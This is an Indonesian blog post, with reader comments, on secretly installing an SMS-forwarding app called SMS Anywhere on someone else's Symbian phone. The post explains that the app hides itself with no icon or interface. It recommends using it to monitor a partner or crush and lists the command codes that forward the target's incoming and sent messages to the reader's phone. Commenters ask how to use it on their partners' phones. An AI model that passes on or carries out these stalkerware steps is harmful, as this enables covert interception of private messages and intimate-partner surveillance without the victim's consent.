Cara Mudah Sadap SMS Orang Lain

Udah lama nie ngga posting setelah sibuk sama yang namanya UTS,,,lama-lama bosen juga jadi mahasiwa,,,postingan saya ini yia mungkin udah banyak yang baca di tetangga sebelah, but ngga ada salahnya kan iseng-iseng skalian menuhin ini blog, disini saya akan jelasin nie CARA MUDAH SADAP SMS ORANG LAIN, ngga perlu ilmu tinggi-tinggi ko buat ngejalanin teknik hacking ini, cukup dengan ponsel berbasis symbian, Ingat loh hanya SYMBIAN dan untuk yang lainnya cukup disimak aja yia,,hhhee, satu lagi nie kegunaan software ini ente-ente sekalian bisa memantau pacar atau gebetan ente, jadi kalo gebetan ente pada macem-macem kan udah ada bukti,,hhee,,,dan beginilah caranya :

pertama siapin dulu nie software namanya SMS Anywhere v 1.0 yang bisa ente sedot dibawah postingan yie, abis itu ente pindahin tuw file dari PC ke Handphone Target, gunain aja Bluetooth, Infrared, Card reader atau Kabel USB dan sejenisnya deh, Tapi ingat Software ini hanya bisa jalan pada hape tipe :
Nokia 7650, 3650/3600, 3660/3620, 6600/6620, 7610, 6260, 6630, 6670, 3230, 6680, 6681/6682, N70, N72, N90, N-Gage, N-Gage QD
Siemens SX1
Panasonic X700, X800, Sendo X, X2
Samsung SGH-D700, D710, D720, D730, Z600
Lenovo P930

dan bisa juga pada beberapa tipe hape lainya tapi hanya yang berbasis SYMBIAN yia karena untuk filenya sendiri bertipe .SIS(smsanywherelite.sis), setelah itu instal deh programnya di hape target, tenang aja dijamin ngga bakalan ketahuan deh, selain karena program ini tidak support GUI (Graphic User Interface) dan juga tidak akan memunculkan icon apapun jadi ketika program berjalan tidak akan terlihat sama sekali.

yAng keduaperhatiin bener nie cara penggunaannya, karena yang pentingnya disini :

> Abis program di instal di Hape Target, set dulu passwordnya yang terdiri dari maksimal 8 karakter, abis itu lakukan perintah kaya gini :

> Untuk mengaktifkan program ini di hape target, caranya kirim SMS lewat hape target dengan mengetik SA(spasi)(password)(spasi)ON. Contoh : SA myacces ON. kirim SMS ini ke nomor hape punya you.

>Untuk menonaktifkannya, ketik SA(spasi)(password)(spasi)OFF. Contoh : SA myacces OFF. kirim ke SMS ini ke nomor hape you.

>Untuk meneruskan SMS yang masuk ke inbox target ke hape Anda jadi ketika ada sms masuk ke hape Target maka otomatis hape anda juga akan menerima sms yang isinya sama pula, caranya kirim SMS lewat handphone target dengan mengetik SA(spasi)(password)(spasi)R1. Contoh : SA myacces R1. kirim ke nomor handphone you.

>Untuk menonaktifkan fasilitas ini (meneruskan SMS), ketik SA(spasi)(password)(spasi)R0. Contoh : SA myacces R0. kirim ke nomor handphone you.

>Untuk meneruskan SMS yang keluar dari handphone target (dari sent item) ke handphone Anda jadi ketika hape target ngirim SMS keluar maka SMS itui pun sampai ke Hape anda, dengan cara mengirim SMS lewat handphone target dengan mengetik SA(spasi)(password)(spasi)S1. Contoh : SA myacces S1. kirim ke nomor handphone lo.

>Untuk menonaktifkan fasilitas ini (SMS keluar), ketik SA(spasi)(password)(spasi)S0. Contoh : SA myacces S0. kirim ke nomor handphone anda.

Download SMS ANYWHERE V 1.0

Download SMS ANYWHERE V 1.0.

Sekian dulu nih postingan saya, segera tuw manfaatin sebaik mungkin yia,,,segala resiko yang ditimbulkan penulis ngga bertanggung jawab,,hhee..
oce,,,terima kasih.

About these ads

21 Tanggapan

  1. seru juga nih. cuman masalahnya HaPe saia tipe nya e90 bisa g ya?

  2. kalo nokia E71 support gag??

  3. Saya coba download kok susah yah,tolong dong kasih tau caranya.txs

  4. sms yang kita dapat dari sms korban yg disadap bayar ya???

    • Kayanya sh kena Pulsa juga,,,

      tapi sekarang kan sudah banyak operator yang menawarkan SMS gratis,,jadi ngga usah khawatir,,,

  5. seru juga ni tapi syaratnya hp target harus symbyan khan??
    tapi kalau hp target N70 tapi hp saya 2630 masih tetap bisa khan??

    • Syaratnya Hape pengirim sms yang akan diinstal aplikasi ini harus berbasis symbian,,,

      Kalo hape penerima sms ngga mesti OS symbian kok,,,

  6. gimana cara aktifin paswornya gmn..?

  7. hape cew.Q nokia 3650 n hapeQ motorola KRZR K1.. kl q mw pasang aplikasi ni k hp cewQ.ntar sms2nya iza msuk k hpQ g?cz hpQ g support symbian.. thanx

    • Syaratnya Hape yang akan di instal Software ini harus symbian,,

      jika yang nerima sms kayanya semua hape bisa

  8. untuk NOKIA E63 Bisa gak mas

  9. maaf mas, yg hrus dpasang app ini dponsel target aj ap dponsel kita juga? mhon pncerahannya , trims

  10. pnya cara untk yang non symbian ngga gan?

  11. punya pakai bloove.com
    bang saya mau tanya gimana cara setting bloove di hp nokia e 71

  12. Gan,,bisa ga klo hp target nokia 2630,sementara hp sy nexian g 923.??

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Logout / Ubah )

Twitter picture

You are commenting using your Twitter account. Logout / Ubah )

Facebook photo

You are commenting using your Facebook account. Logout / Ubah )

Google+ photo

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

Ikuti

Get every new post delivered to your Inbox.

%d bloggers like this: